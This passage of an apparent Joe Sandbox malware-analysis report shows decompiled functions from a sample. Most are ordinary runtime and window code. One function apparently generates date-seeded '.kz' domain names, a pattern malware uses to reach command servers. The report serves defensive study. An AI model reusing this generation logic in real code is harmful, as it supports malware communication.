                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Global$CloseLockOpenPrinterPrinter.Unlock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2952119977-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 70921a1b78205f40bb25b74502d9433f4d87da7cc51139b3cec17e3b76f32ffc
                                                                                                                                                                                                                                                                                          • Instruction ID: 7c06e0f5779ad19719ec095cb6bc24d9a3ce927f175a165cf5c912422a61e2cb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70921a1b78205f40bb25b74502d9433f4d87da7cc51139b3cec17e3b76f32ffc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40018CB1940229ABE7109F69ED49BDBBBFCEB08700F008215E804D7640EBB48994CBA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E001065FC(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v0;
                                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                                                                                                          				signed int _t12;
                                                                                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t31 = __esi;
                                                                                                                                                                                                                                                                                          				_t29 = __edi;
                                                                                                                                                                                                                                                                                          				_t28 = __edx;
                                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                                          					_t11 = E00105E1C(_t28, _t29, _t31, _a4);
                                                                                                                                                                                                                                                                                          					if(_t11 != 0) {
                                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t12 = E00108912(_t11, _a4);
                                                                                                                                                                                                                                                                                          					__eflags = _t12;
                                                                                                                                                                                                                                                                                          					if(_t12 == 0) {
                                                                                                                                                                                                                                                                                          						__eflags =  *0x170c9c & 0x00000001;
                                                                                                                                                                                                                                                                                          						if(( *0x170c9c & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          							 *0x170c9c =  *0x170c9c | 0x00000001;
                                                                                                                                                                                                                                                                                          							__eflags =  *0x170c9c;
                                                                                                                                                                                                                                                                                          							_push(1);
                                                                                                                                                                                                                                                                                          							_v8 = "bad allocation";
                                                                                                                                                                                                                                                                                          							E00109B08(0x170c90,  &_v8);
                                                                                                                                                                                                                                                                                          							 *0x170c90 = 0x110558;
                                                                                                                                                                                                                                                                                          							E0010623D( *0x170c9c, 0x10fd87);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E00109C1E( &_v20, 0x170c90);
                                                                                                                                                                                                                                                                                          						_v20 = 0x110558;
                                                                                                                                                                                                                                                                                          						E00109C43( &_v20, 0x11445c);
                                                                                                                                                                                                                                                                                          						asm("int3");
                                                                                                                                                                                                                                                                                          						__eflags =  *0x170ca8 - 1;
                                                                                                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          							E001088CA(_t28, __eflags);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t16 = E0010871B(_t28, _v0);
                                                                                                                                                                                                                                                                                          						E00108435(0xff);
                                                                                                                                                                                                                                                                                          						return _t16;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t11;
                                                                                                                                                                                                                                                                                          				goto L10;
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x001065fc
                                                                                                                                                                                                                                                                                          0x001065fc
                                                                                                                                                                                                                                                                                          0x001065fc
                                                                                                                                                                                                                                                                                          0x00106613
                                                                                                                                                                                                                                                                                          0x00106616
                                                                                                                                                                                                                                                                                          0x0010661e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00106609
                                                                                                                                                                                                                                                                                          0x0010660f
                                                                                                                                                                                                                                                                                          0x00106611
                                                                                                                                                                                                                                                                                          0x00106622
                                                                                                                                                                                                                                                                                          0x00106633
                                                                                                                                                                                                                                                                                          0x00106635
                                                                                                                                                                                                                                                                                          0x00106635
                                                                                                                                                                                                                                                                                          0x0010663c
                                                                                                                                                                                                                                                                                          0x00106644
                                                                                                                                                                                                                                                                                          0x0010664b
                                                                                                                                                                                                                                                                                          0x00106655
                                                                                                                                                                                                                                                                                          0x0010665b
                                                                                                                                                                                                                                                                                          0x00106660
                                                                                                                                                                                                                                                                                          0x00106665
                                                                                                                                                                                                                                                                                          0x00106673
                                                                                                                                                                                                                                                                                          0x00106676
                                                                                                                                                                                                                                                                                          0x0010667b
                                                                                                                                                                                                                                                                                          0x00106681
                                                                                                                                                                                                                                                                                          0x00106688
                                                                                                                                                                                                                                                                                          0x0010668a
                                                                                                                                                                                                                                                                                          0x0010668a
                                                                                                                                                                                                                                                                                          0x00106692
                                                                                                                                                                                                                                                                                          0x0010669c
                                                                                                                                                                                                                                                                                          0x001066a4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00106611
                                                                                                                                                                                                                                                                                          0x00106621
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00106616
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105E1C: __FF_MSGBANNER.LIBCMT ref: 00105E35
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105E1C: __NMSG_WRITE.LIBCMT ref: 00105E3C
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105E1C: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00109160,?,00000001,?,?,0010A609,00000018,00114600,0000000C,0010A699), ref: 00105E61
                                                                                                                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 0010664B
                                                                                                                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 00106665
                                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00106676
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 615853336-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e1d4d154a7166ac55807486e8bb8c9b654bc011dbc24a74049c7302ad44b3200
                                                                                                                                                                                                                                                                                          • Instruction ID: c2eaddab86055450b7025e4391422b48781f1a94a217875b1c3bb3db1e83d16c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1d4d154a7166ac55807486e8bb8c9b654bc011dbc24a74049c7302ad44b3200
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F02830900209AADB06FB54ED12EAE7AB9AB54314F240168F488E64D2CFF18BD0CF81
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FEE60(intOrPtr __eax, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				long _t16;
                                                                                                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t26 = __eax;
                                                                                                                                                                                                                                                                                          				if(GetFocus() !=  *(_t26 + 4)) {
                                                                                                                                                                                                                                                                                          					if(( *(_t26 + 0x58) & 0x00000004) != 0 &&  *((intOrPtr*)(_t26 + 0xac)) == 0) {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t26 + 0xac)) = GetFocus();
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					SetFocus( *(_t26 + 4));
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t16 = SendMessageA( *(_t26 + 4), 0x419,  *(_a4 + 0xc), 0);
                                                                                                                                                                                                                                                                                          				 *(_t26 + 0x84) =  *(_t26 + 0x84) & 0x000000cf;
                                                                                                                                                                                                                                                                                          				E00100C90(_t16, _t26, 1);
                                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x000fee6c
                                                                                                                                                                                                                                                                                          0x000fee73
                                                                                                                                                                                                                                                                                          0x000fee79
                                                                                                                                                                                                                                                                                          0x000fee86
                                                                                                                                                                                                                                                                                          0x000fee86
                                                                                                                                                                                                                                                                                          0x000fee90
                                                                                                                                                                                                                                                                                          0x000fee90
                                                                                                                                                                                                                                                                                          0x000feea8
                                                                                                                                                                                                                                                                                          0x000feeae
                                                                                                                                                                                                                                                                                          0x000feeb9
                                                                                                                                                                                                                                                                                          0x000feec4

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetFocus.USER32(?,?,?,?,000FBFB0,?), ref: 000FEE6E
                                                                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 000FEE84
                                                                                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 000FEE90
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000419,?,00000000), ref: 000FEEA8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Focus$MessageSend
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 733279069-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ff4d11c2cc30bc26107a82fbdca0c01f5e9dca688f50a57e78ed214c69b50340
                                                                                                                                                                                                                                                                                          • Instruction ID: 0f4c85c068ca22fffe38a83430e5ce47344e12bb5014cf4c1f3861a084e83087
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff4d11c2cc30bc26107a82fbdca0c01f5e9dca688f50a57e78ed214c69b50340
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBF0C2356043489FD321DB75DD49B67BBD8AB45720F01881DEA95C7691C6B1B880CB61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000F9740(void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				struct HWND__* _t8;
                                                                                                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t20 = __eflags;
                                                                                                                                                                                                                                                                                          				DestroyWindow( *(__esi + 0x4c8));
                                                                                                                                                                                                                                                                                          				_t8 =  *(__esi + 0x524);
                                                                                                                                                                                                                                                                                          				 *(__esi + 0x2c) = _t8;
                                                                                                                                                                                                                                                                                          				ShowWindow(_t8, 5);
                                                                                                                                                                                                                                                                                          				SendMessageA( *(__esi + 0x24), 0x423, 1, 1);
                                                                                                                                                                                                                                                                                          				SendMessageA( *(__esi + 0x24), 0x423, 2, 0);
                                                                                                                                                                                                                                                                                          				E000FA7D0(_t14, __esi, _t20, 1);
                                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                                          0x000f9740
                                                                                                                                                                                                                                                                                          0x000f9748
                                                                                                                                                                                                                                                                                          0x000f974e
                                                                                                                                                                                                                                                                                          0x000f9757
                                                                                                                                                                                                                                                                                          0x000f975a
                                                                                                                                                                                                                                                                                          0x000f9773
                                                                                                                                                                                                                                                                                          0x000f9782
                                                                                                                                                                                                                                                                                          0x000f9788
                                                                                                                                                                                                                                                                                          0x000f9790

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,000F7A4C), ref: 000F9748
                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005,?,000F7A4C), ref: 000F975A
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000423,00000001,00000001), ref: 000F9773
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000423,00000002,00000000), ref: 000F9782
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FA7D0: GetClientRect.USER32 ref: 000FA807
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FA7D0: SetWindowPos.USER32(00000000,00000000,00000000,?,00000000,?,00000014,?), ref: 000FA83E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$MessageSend$ClientDestroyRectShow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1904804273-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6c9c22c9d721322d3796f645f6f274ced4a8dbbb563c4fc3fb0dc0d997e508db
                                                                                                                                                                                                                                                                                          • Instruction ID: f07dbc1d39167f032417df0e82d79538df32978fa7c6afccd791baae72eb691e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c9c22c9d721322d3796f645f6f274ced4a8dbbb563c4fc3fb0dc0d997e508db
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DF030717507006BE624AB75DD4AF8773E5AB8CB01F008909F3069B6C0C5F4F4818F14
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040092E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct _SYSTEMTIME _v28;
                                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				char _v172;
                                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                                          					GetLocalTime( &_v28);
                                                                                                                                                                                                                                                                                          					_t46 = E040097E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
                                                                                                                                                                                                                                                                                          					_t84 = _t83 + 0xc;
                                                                                                                                                                                                                                                                                          					_v12 = _t46 + _a12;
                                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                                          					while(_v32 < _a8) {
                                                                                                                                                                                                                                                                                          						E04007D20( &_v172,  &_v172, 0, 0x80);
                                                                                                                                                                                                                                                                                          						_t50 = E04008BB0( &_v12, 4,  &_v172, 0x80);
                                                                                                                                                                                                                                                                                          						_t86 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                                          						_v40 = _t50;
                                                                                                                                                                                                                                                                                          						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                                          							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v12 = _v172;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                                          						E04009650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
                                                                                                                                                                                                                                                                                          						_t84 = _t86 + 0x10;
                                                                                                                                                                                                                                                                                          						lstrcatA(_v32 * 0x28 + _a4, ".kz");
                                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                          						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x040092e9
                                                                                                                                                                                                                                                                                          0x040092f4
                                                                                                                                                                                                                                                                                          0x04009308
                                                                                                                                                                                                                                                                                          0x0400931d
                                                                                                                                                                                                                                                                                          0x04009322
                                                                                                                                                                                                                                                                                          0x04009328
                                                                                                                                                                                                                                                                                          0x0400932b
                                                                                                                                                                                                                                                                                          0x0400933d
                                                                                                                                                                                                                                                                                          0x04009357
                                                                                                                                                                                                                                                                                          0x04009371
                                                                                                                                                                                                                                                                                          0x04009376
                                                                                                                                                                                                                                                                                          0x04009379
                                                                                                                                                                                                                                                                                          0x04009380
                                                                                                                                                                                                                                                                                          0x04009396
                                                                                                                                                                                                                                                                                          0x04009382
                                                                                                                                                                                                                                                                                          0x04009388
                                                                                                                                                                                                                                                                                          0x04009388
                                                                                                                                                                                                                                                                                          0x040093a8
                                                                                                                                                                                                                                                                                          0x040093c4
                                                                                                                                                                                                                                                                                          0x040093c9
                                                                                                                                                                                                                                                                                          0x040093db
                                                                                                                                                                                                                                                                                          0x040093e7
                                                                                                                                                                                                                                                                                          0x040093f0
                                                                                                                                                                                                                                                                                          0x0400933a
                                                                                                                                                                                                                                                                                          0x0400933a
                                                                                                                                                                                                                                                                                          0x0400933d
                                                                                                                                                                                                                                                                                          0x040093fe

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 04009308
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,.kz), ref: 040093DB
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                                                          • String ID: .kz
                                                                                                                                                                                                                                                                                          • API String ID: 2740484991-4216035510
                                                                                                                                                                                                                                                                                          • Opcode ID: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                                          • Instruction ID: bb0d42d70b93f9fb2e2ab601979b3322a165a8cda29c6817b22e5740edda4972
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D310AB1E00209EBEF08DF94C885BEEB7B5EF58304F10C159E515B7281E678AA85CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FFCC0(void* __ebx, int* __edi, intOrPtr* __esi, intOrPtr _a4, char _a8) {
                                                                                                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                                                                                                          				int* _t34;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t35;
                                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t35 = __esi;
                                                                                                                                                                                                                                                                                          				_t34 = __edi;
                                                                                                                                                                                                                                                                                          				_t28 = __ebx;
                                                                                                                                                                                                                                                                                          				if(__ebx == 2) {
                                                                                                                                                                                                                                                                                          					_t25 =  *__esi;
                                                                                                                                                                                                                                                                                          					if(_t25 != 0) {
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t25 + 4), 0x10, 0, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *_t34 = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(( *0x1719b0 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          					 *0x1719b0 =  *0x1719b0 | 0x00000001;
                                                                                                                                                                                                                                                                                          					 *0x1719ac = RegisterWindowMessageA("commdlg_FindReplace");
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t40 = _t28 -  *0x1719ac; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t40 != 0) {
                                                                                                                                                                                                                                                                                          					if(_t28 != 0x111) {
                                                                                                                                                                                                                                                                                          						L19:
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t11 = _a4;
                                                                                                                                                                                                                                                                                          						if(0xe124 != _t11) {
                                                                                                                                                                                                                                                                                          							if(0xe128 != _t11) {
                                                                                                                                                                                                                                                                                          								if(0xe129 != _t11) {
                                                                                                                                                                                                                                                                                          									goto L19;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_a8 = 1;
                                                                                                                                                                                                                                                                                          									 *_t34 = E00101920(_t35,  &_a8);
                                                                                                                                                                                                                                                                                          									if(_a8 != 0) {
                                                                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										goto L19;
